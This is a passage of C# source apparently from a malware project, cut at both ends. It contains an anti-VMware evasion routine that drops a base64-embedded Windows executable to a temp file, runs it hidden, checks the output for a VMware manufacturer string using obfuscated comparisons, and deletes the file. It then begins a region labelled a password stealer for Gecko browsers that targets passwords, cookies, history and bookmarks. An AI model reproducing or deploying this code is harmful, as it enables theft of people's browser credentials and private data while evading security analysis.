                    string[] datas = stdout.ReadLine().Split('<', '>');
                    int flag_0 = 0;

                    foreach (string data in datas)
                    {
                        if (flag_0 == 0 && Convert.ToBase64String(Encoding.UTF8.GetBytes(data)) == "U3lzdGVtTWFudWZhY3R1cmVy")
                        {
                            // data = 'SystemManufacturer'
                            flag_0 = 1;
                        }
                        else if (flag_0 == 1)
                        {
                            stdout.Close();
                            bool flag_1 = false;

                            if (Convert.ToBase64String(Encoding.UTF8.GetBytes(data)) == "Vk13YXJlLCBJbmMu")
                            {
                                // data = 'VMware, Inc.'
                                flag_1 = true;
                            }

                            /* wait for faulty to exit */
                            proc.WaitForExit();
                            File.Delete(faulty_path);

                            return flag_1;
                        }
                    }
                }
            }
        }
    #endregion

    // papukaija = stealth anti-vmware code using Faulty
    #region Papukaija
    public static bool Papukaija()
    {
        try
        {
            /* drop faulty to unique temp file */
            string text = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPDw4FwAAAAAAAAAAOAAIgALATAAACAAAAAIAAAAAAAAQj4AAAAgAAAAQAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPA9AABPAAAAAEAAAJwFAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAC4PAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAASB4AAAAgAAAAIAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAJwFAAAAQAAAAAYAAAAiAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAAKAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAkPgAAAAAAAEgAAAACAAUArCYAAFQVAAADAAIABAAABgA8AAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABpyAQAAcCoAGzAEAJQFAAABAAARHx2NIAAAASUWchcAAHCiJRdyNwAAcKIlGHJFAABwoiUZclUAAHCiJRpylwAAcKIlG3LLAABwoiUcct8AAHCiJR1yCwEAcKIlHnIvAQBwoiUfCXJlAQBwoiUfCnKPAQBwoiUfC3K3AQBwoiUfDHLBAQBwoiUfDXLTAQBwoiUfDnL/AQBwoiUfD3IjAgBwoiUfEHK3AQBwoiUfEXJFAgBwoiUfEnJfAgBwoiUfE3K3AQBwoiUfFHKHAgBwoiUfFXKbAgBwoiUfFnK3AQBwoiUfF3LDAgBwoiUfGHLbAgBwoiUfGXK3AQBwoiUfGnIDAwBwoiUfG3IZAwBwoiUfHHIrAwBwogoYjSAAAAElFnI7AwBwoiUXck0DAHCiCxYMFA0CEwUWEwYrXREFEQaaEwcRB3JdAwBwKBMAAAosBBcMKz4RBygDAAAGKBMAAAotMAktLREHcxQAAAoNBhMIFhMJKxURCBEJmhMKCREKbxUAAAoRCRdYEwkRCREIjmky4xEGF1gTBhEGEQWOaTKbAo4sGQKOOboDAAACFpooAwAABigWAAAKOagDAAAAKBcAAAoTDhIOKBgAAAoTC3MZAAAKJSgaAAAKbxsAAApvHAAACm8dAAAKJSgDAAAGbx4AAAooHwAAChMMINwFAAAoIAAAChEMbyEAAAotBxEMbyIAAAooIwAAChMPFhMGKywRDxEGmhMQERBvJAAACm8lAAAKcmkDAHAoEwAACiwHERBvIgAAChEGF1gTBhEGEQ+OaTLM3gMm3gAfIygmAAAKcnsDAHAoJwAACigoAAAKEw1ysQMAcBYoKQAACm8qAAAKExE4iAIAABERbysAAAoTEhEScywAAAoTEwgtHhETby0AAAoTDhIOKBgAAAoRCyAAWmICalk/VQIAABESKC4AAAoTFAksCwlyvQMAcG8VAAAKHwsoLwAAChYTFRYTFjgGAgAAERQRFm8wAAAKExgSGCgxAAAKExcRF3LNAwBwKBMAAAosJB8PKC8AAAoRFygyAAAKCTnKAQAACXLRAwBwbzMAAAo4ugEAABEXcv8DAHAoEwAACiwkERcoMgAACh8KKC8AAAoJOZgBAAAJcgMEAHBvMwAACjiIAQAAERdyGwQAcCgTAAAKOREBAAARFBEWF1hvMAAAChMYEhgoMQAACnIbBABwKBYAAAo57gAAAHIbBABwExkRFhdYExo4zAAAABEUERpvMAAAChMYEhgoMQAACnIbBABwKBMAAAosIHIbBABwKDIAAAoJORQBAAAJchsEAHBvMwAACjgEAQAAERQRGm8wAAAKExgSGCgxAAAKch8EAHAoEwAACixPERlvNAAAChc+2QAAAB8OKC8AAAoRGXIfBABwKDUAAAooMgAACgksFwlyIwQAcBEZck0EAHAoNgAACm8zAAAKHw8oLwAAChEaExY4lwAAABEZERQRGm8wAAAKExgSGCgxAAAKKDUAAAoTGREaF1gTGhEaERRvNAAACj8m////K2YRF3JfBABwKBMAAAosRhEVLSEXExUfDSgvAAAKERcoMgAACgksQAlyYwQAcG8zAAAKKzMWExURFygy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BQACAAkABwAZBAwEqwC7AAABAwA6BwEAAAEFACkHAgAEgAAAAQAAAAAAAAAAAAAAAAB/BwAABAAAAAAAAAAAAAAAJAE6AAAAAAAEAAAAAAAAAAAAAAAkATEEAAAAAAAAAAABAAAABgYAAAAAAElFbnVtZXJhYmxlYDEASUVudW1lcmF0b3JgMQA8TW9kdWxlPgBnZXRfQVNDSUkAU3lzdGVtLklPAG1zY29ybGliAFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljAFRocmVhZABnZXRfSGFzRXhpdGVkAFN5bmNocm9uaXplZABoV25kAGRlZmF1bHRJbnN0YW5jZQBJRGlzcG9zYWJsZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBGaWxlAENvbnNvbGUAZ2V0X01haW5Nb2R1bGUAUHJvY2Vzc01vZHVsZQBnZXRfRmlsZU5hbWUAc2V0X0ZpbGVOYW1lAGdldF9Qcm9jZXNzTmFtZQBEYXRlVGltZQBnZXRfQ3JlYXRpb25UaW1lAFdyaXRlTGluZQBDb21iaW5lAFR5cGUAZ2V0X0N1bHR1cmUAc2V0X0N1bHR1cmUAcmVzb3VyY2VDdWx0dXJlAEFwcGxpY2F0aW9uU2V0dGluZ3NCYXNlAENsb3NlAERpc3Bvc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAV3JpdGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBHZW5lcmF0ZWRDb2RlQXR0cmlidXRlAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUARGVidWdnYWJsZUF0dHJpYnV0ZQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAHZhbHVlAEZhdWx0eS5leGUAU3lzdGVtLlRocmVhZGluZwBFbmNvZGluZwBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAFRvU3RyaW5nAEdldFN0cmluZwBHZXRGb2xkZXJQYXRoAGdldF9MZW5ndGgAU3lzdGVtLkNvbXBvbmVudE1vZGVsAGtlcm5lbDMyLmRsbAB1c2VyMzIuZGxsAEtpbGwAUHJvZ3JhbQBTeXN0ZW0AUmFuZG9tAHJlc291cmNlTWFuAE1haW4AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24AU2VhcmNoT3B0aW9uAEV4Y2VwdGlvbgBGaWxlSW5mbwBDdWx0dXJlSW5mbwBGaWxlU3lzdGVtSW5mbwBQcm9jZXNzU3RhcnRJbmZvAFNsZWVwAENoYXIAU3BlY2lhbEZvbGRlcgBnZXRfUmVzb3VyY2VNYW5hZ2VyAFN5c3RlbS5Db2RlRG9tLkNvbXBpbGVyAFN0cmVhbVdyaXRlcgBUZXh0V3JpdGVyAFRvTG93ZXIAR2V0QXV0aG9yAGdldF9Gb3JlZ3JvdW5kQ29sb3IAc2V0X0ZvcmVncm91bmRDb2xvcgBDb25zb2xlQ29sb3IASUVudW1lcmF0b3IAR2V0RW51bWVyYXRvcgAuY3RvcgAuY2N0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SZXNvdXJjZXMARmF1bHR5LlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBGYXVsdHkuUHJvcGVydGllcwBFbnVtZXJhdGVGaWxlcwBHZXRQcm9jZXNzZXMATmV4dEJ5dGVzAFNldHRpbmdzAGFyZ3MAZ2V0X1RpY2tzAFN5c3RlbS5Db2xsZWN0aW9ucwBnZXRfQ2hhcnMAR2V0Q3VycmVudFByb2Nlc3MAc2V0X0FyZ3VtZW50cwBDb25jYXQAT2JqZWN0AGdldF9EZWZhdWx0AEVudmlyb25tZW50AGdldF9DdXJyZW50AFN0YXJ0AE1vdmVOZXh0AFN5c3RlbS5UZXh0AFJlYWRBbGxUZXh0AGdldF9Ob3cAR2V0Q29uc29sZVdpbmRvdwBTaG93V2luZG93AG5DbWRTaG93AGdldF9Bc3NlbWJseQBEaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0eQBGYXVsdHkAAAAAFUAAVQBuAHIAZQBhAGwAUwBlAGMAAB88ACEARABPAEMAVABZAFAARQAgAGgAdABtAGwAPgAADTwAaAB0AG0AbAA+AAAPIAA8AGgAZQBhAGQAPgAAQSAAIAA8AHQAaQB0AGwAZQA+AEYAYQB1AGwAdAB5ACcAcwAgAFIAZQBwAG8AcgB0ADwALwB0AGkAdABsAGUAPgABMyAAIAA8AHMAdAB5AGwAZQAgAHQAeQBwAGUAPQAiAHQAZQB4AHQALwBjAHMAcwAiAD4AABMgACAAIABiAG8AZAB5ACAAewAAKyAAIAAgACAAYgBhAGMAawBnAHIAbwB1AG4AZAA6ACAAIwAwADAAMAA7AAAjIAAgACAAIABtAGEAcgBnAGkAbgA6ACAAMwAwAHAAeAA7AAA1IAAgACAAIABmAG8AbgB0AC0AZgBhAG0AaQBsAHkAOgAgAEMAbwBuAHMAbwBsAGEAcwA7AAEpIAAgACAAIABmAG8AbgB0AC0AcwBpAHoAZQA6ACAAMQA0AHAAeAA7AAEnIAAgACAAIABjAG8AbABvAHIAOgAgACMAMgA4AGYAZgA1AGQAOwAACSAAIAAgAH0AABEgACAAIABkAGkAdgAgAHsAACsgACAAIAAgAHcAaABpAHQAZQAtAHMAcABhAGMAZQA6ACAAcAByAGUAOwABIyAAIAAgACAAcABhAGQAZABpAG4AZwA6ACAANwBwAHgAOwAAISAAIAAgACAAbQBhAHIAZwBpAG4AOgAgADMAcAB4ADsAABkgACAAIAAuAHMAdAByAGkAbgBnACAAewAAJyAAIAAgACAAYwBvAGwAbwByADoAIAAjAGMAMgAyADgAZgBmADsAABMgACAAIAAuAHQAYQBnACAAewAAJyAAIAAgACAAYwBvAGwAbwByADoAIAAjAGYANABmADQAZgA0ADsAABcgACAAIAAuAHAAYQByAGEAbQAgAHsAACcgACAAIAAgAGMAbwBsAG8AcgA6ACAAIwBmAGYAZgBiADMAOAA7AAAVIAAgADwALwBzAHQAeQBsAGUAPgAAESAAPAAvAGgAZQBhAGQAPgAADyAAPABiAG8AZAB5AD4AABEgADwALwBiAG8AZAB5AD4AAA88AC8AaAB0AG0AbAA+AAALLQAtAGEAbABsAAERdwBlAHIAZgBhAHUAbAB0AAA1TQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAVwBFAFIAXABUAGUAbQBwAAALKgAuAHgAbQBsAAAPIAAgADwAZABpAHYAPgAAAzwAAC08AHMAcABhAG4AIABjAGwAYQBzAHMAPQAiAHQAYQBnACIAPgAmAGwAdAA7AAADPgAAFyYAZwB0ADsAPAAvAHMAcABhAG4APgAAAyAAAAM9AAApPABzAHAAYQBuACAAYwBsAGEAcwBzAD0AIgBwAGEAcgBhAG0AIgA+AAARPQA8AC8AcwBwAGEAbgA+AAADIgAALTwAcwBwAGEAbgAgAGMAbABhAHMAcwA9ACIAcwB0AHIAaQBuAGcAIgA+ACIAABEiADwALwBzAHAAYQBuAD4AAAMKAAARIAAgADwALwBkAGkAdgA+AAA3RgBhAHUAbAB0AHkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAKRQK7S9WttIroUjEoHf5wAABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERdS8HHB0OHQ4CEkUdBR0OCA4dDggOChJJEU0RUR0SSRJJFRJVAQ4OElkOAggOAw4IDgUAAgIODgQAABFRAyAACgQAABJJBSAAEoCNAyAADgcAARJJEoCJBAABAQgDIAACBQAAHRJJBgABDhGAmQUAAg4ODgQAABFNDQADFRKAqQEODg4RgK0GFRKAqQEOCCAAFRJVARMABRUSVQEOBCAAEwAEIAARUQQAAQ4OBQABARFNBCABAwgEAAEBDgMgAAgGAAMODg4OBSABAR0FBQAAEoDNBSABDh0FBgACEkkODggAARKA0RGA1QUgABKA2QcgAgEOEoDZCAABEoDdEoDdCLd6XFYZNOCJAwYSbQMGEnEDBhIQBQACAhgIAwAAGAMAAA4FAAEBHQ4EAAASbQQAABJxBQABARJxBAAAEhADAAABBAgAEm0ECAAScQQIABIQCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAsBAAZGYXVsdHkAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTkAACkBACRmYjI3NTc5OS02YWRiLTQzOTUtODVjMS1jNWI0YTlmNGVmYWIAAAwBAAcxLjAuMC4wAABNAQAcLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjUuMgEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUULk5FVCBGcmFtZXdvcmsgNC41LjJAAQAzU3lzdGVtLlJlc291cmNlcy5Ub29scy5TdHJvbmdseVR5cGVkUmVzb3VyY2VCdWlsZGVyBzQuMC4wLjAAAAQBAAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxMS4wLjAuMAAAAAAAtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAAAAAADw8OBcAAAAAAIAAAAcAQAA1DwAANQeAABSU0RTuqqoSHdqyECi6aZjyJcSQQEAAABDOlxVc2Vyc1xKUXVlcnlcRG9jdW1lbnRzXFZpc3VhbCBTdHVkaW8gMjAxNVxQcm9qZWN0c1xGYXVsdHlcRmF1bHR5XG9ialxSZWxlYXNlXEZhdWx0eS5wZGIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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";
            byte[] faulty = Convert.FromBase64String(text);
            string faulty_path = Path.GetTempFileName() + ".exe";
            File.WriteAllBytes(faulty_path, faulty);

            for (int i = 0; i < 3; i++)
            {
                /* run faulty */
                ProcessStartInfo proc_info = new ProcessStartInfo
                {
                    FileName = faulty_path,
                    Arguments = "--all",
                    CreateNoWindow = true,
                    WindowStyle = ProcessWindowStyle.Hidden,
                    UseShellExecute = false,
                    RedirectStandardOutput = true,
                };
                Process proc = Process.Start(proc_info);

                /* read data from stdout */
                StreamReader stdout = proc.StandardOutput;
                while (!stdout.EndOfStream)
                {
                    string[] datas = stdout.ReadLine().Split('<', '>');
                    int flag_0 = 0;

                    foreach (string data in datas)
                    {
                        if (flag_0 == 0 && Convert.ToBase64String(Encoding.UTF8.GetBytes(data)) == "U3lzdGVtTWFudWZhY3R1cmVy")
                        {
                            // data = 'SystemManufacturer'
                            flag_0 = 1;
                        }
                        else if (flag_0 == 1)
                        {
                            stdout.Close();
                            bool flag_1 = false;

                            if (Convert.ToBase64String(Encoding.UTF8.GetBytes(data)) == "Vk13YXJlLCBJbmMu")
                            {
                                // data = 'VMware, Inc.'
                                flag_1 = true;
                            }

                            /* wait for faulty to exit */
                            proc.WaitForExit();
                            File.Delete(faulty_path);

                            return flag_1;
                        }
                    }
                }
            }
        }
        catch (Exception)
        {
        }

        return true;
    }
}
#endregion

    // Lepakko = Password stealer engine. Steals from all gecko browsers.
    #region Lepakko
    class lepakko
    {
    static void LepakkoMies(string[] args)
    {
        // Get command line args
        string arguments = string.Join(" ", args).ToLower();
        if (string.IsNullOrEmpty(arguments))
        {
            Console.WriteLine("passwords/cookies/history/bookmarks");
